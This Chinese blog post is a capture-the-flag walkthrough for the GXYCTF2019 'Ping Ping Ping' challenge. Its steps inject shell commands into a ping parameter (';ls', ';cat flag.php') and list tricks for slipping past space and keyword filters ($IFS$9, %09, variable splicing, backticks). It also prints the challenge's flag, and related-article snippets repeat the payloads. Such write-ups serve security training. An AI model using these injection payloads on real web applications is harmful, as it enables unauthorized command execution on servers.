[GXYCTF2019]Ping Ping Ping通关详解

已于 2025-06-20 09:16:20 修改
阅读量756 收藏 4
点赞数 20
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全 buuctf
于 2025-06-15 09:37:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74135202/article/details/148666363

1.首先打开网页

我们得到提示/?ip=  尝试将提示添加到url

2.输入/?ip=127.0.0.1

url/?ip=127.0.0.1

从回显的64字节判断为linux的ping 127.0.0.1的结果  接下来尝试使用linux相关命令执行漏洞进行绕过

3.输入/?ip=127.0.0.1;ls 尝试查看当前目录下的文件

url/?ip=127.0.0.1;ls

我们可以看到有两个文件 flag.php和index.php

4.Linux其他命令连接符

url/?ip=127.0.0.1&ls

&&  

url/?ip=127.0.0.1&&ls

由回显得到ls命令都没有被正确执行 即& &&命令连接符都被屏蔽 接下来尝试查看已经发现的两个文件的具体信息

5.使用cat flag.php查看flag.php信息

url/?ip=127.0.0.1;cat flag.php

由回显得到空格被过滤 尝试绕过空格过滤

空格过滤绕过

${IFS}

$IFS$9

%09

{}

<

注:常用频率从上到下依次减少

6.绕过空格过滤

1)尝试使用${IFS}

url/?ip=127.0.0.1;cat${IFS}flag.php

未成功

2)尝试使用$IFS$9

url/?ip=127.0.0.1;cat$IFS$9flag.php

空格过滤成功 我们又发现flag被过滤了 接下来我们尝试绕过关键字过滤

7.绕过关键字过滤

先尝试一下变量拼接绕过

url/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

得到回显 尝试查看页面源代码

8.查看页面源代码

我们可以找到flag

即flag{94a3a65e-af7a-4b39-9791-8b2382c438aa}

zyylp
关注
解锁Ubuntu安装:从新手到高手的通关秘籍
邓邓子的博客
06-29 1192
本文为 Ubuntu 系统安装全指南,从新手视角拆解安装全流程。前期准备阶段详解硬件要求、安装场景(学习 / 开发等)及虚拟机与双系统方案对比;虚拟机安装部分涵盖 VMware 配置、镜像加载、分区设置及 VMware Tools 安装;双系统安装聚焦磁盘空间划分、U 盘启动盘制作、BIOS 设置及分区实操;另设常见问题修复(分区错误、引导故障等)与安装后系统更新、中文环境配置等实用内容。无论新手入门还是进阶操作,本文通过分步骤解析与场景化建议,助力读者高效完成 Ubuntu 系统部署与基础优化。
pikachu靶场通关
2301_80185313的博客
09-19 1644
pikachu靶场通关详解
[GXYCTF2019]Ping Ping Ping
V50小白
09-15 1351
1、 点开题目链接发现是ping一个ip的参数 2、 输入/?ip=127.0.0.1尝试,只出现一个响应,说明是Windows的ping命令 3、 输入/?ip=127.0.0.1;ls查看当前存在的目录文件夹 4、输入命令/?ip=127.0.0.1;cat flag.php查看flag文件,发现fxck your space!(关闭你的空间) 说明存在对空格的过滤 5、网上一般的判断空格过滤方法:判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用: 注:%20(spac
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8358
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
DVWA通关详解
最新发布
03-30
</think>### DVWA通关教程详解 DVWA(Damn Vulnerable Web Application)是一个用于学习Web漏洞的靶场平台,提供从低到高不同安全等级的漏洞环境。以下是常见漏洞类型的通关思路及利用方法: --- #### 一、CSRF...
DVWA大通关详解(持续更新)
世间繁华梦一出
11-25 4173
** LOW ** BRUTE Force(爆库) <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FRO
DVWA靶场通关
2301_80185313的博客
08-14 1528
dvvwa靶场通关详解
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 774
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
buuctf [GXYCTF2019]Ping Ping Ping
03-28
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的代码片段可以看出,程序接收用户提交的`ip`参数,并将其作为`shell_exec()`函数的一部分来调用`ping`命令[^4]。然而,在实际运行过程中,存在多层正则表达式过滤逻辑,用于防止恶意字符注入和敏感关键字(如`flag`)的出现。 #### 绕过方法解析 ##### 方法一:利用`${IFS}`替代空格 由于题目明确指出对空白字符进行了严格过滤,因此无法直接使用空格分隔命令参数。可以通过引入环境变量`${IFS}`(Internal Field Separator),它默认表示为空白符,从而完成命令拼接[^3]: ```bash /?ip=cat${IFS}/flag.php ``` ##### 方法二:内联执行与反引号组合 除了替换空格外,还可以借助Shell内置功能——内联执行(Backticks)。这种方式允许在一个命令内部嵌套另一个子命令的结果作为其一部分参与运算[^1]: ```bash /?ip=`cat flag.php` ``` ##### 方法三:变量拆分重组 当某些特定单词被整体屏蔽时(例如这里的“flag”),可以考虑将目标字符串分割成多个部分分别赋值给不同变量名,最后再动态组装起来形成最终路径[^2]: ```php /?ip=127.0.0.1;b=ag;a=fl;cat$IFS$a$b.php ``` 以上三种方案均能有效规避现有检测规则限制的同时达成预期效果即读取服务器上的文件内容。 #### 实际操作演示 假设我们已经找到了合适的payload,则可以直接访问对应URL地址获取FLAG信息。例如采用第二种方法的话请求形式如下所示: ```http GET /?ip=`cat%20flag.php` HTTP/1.1 Host: target-server.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` 如果一切正常,响应数据中应该会包含我们需要的目标文件具体内容。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值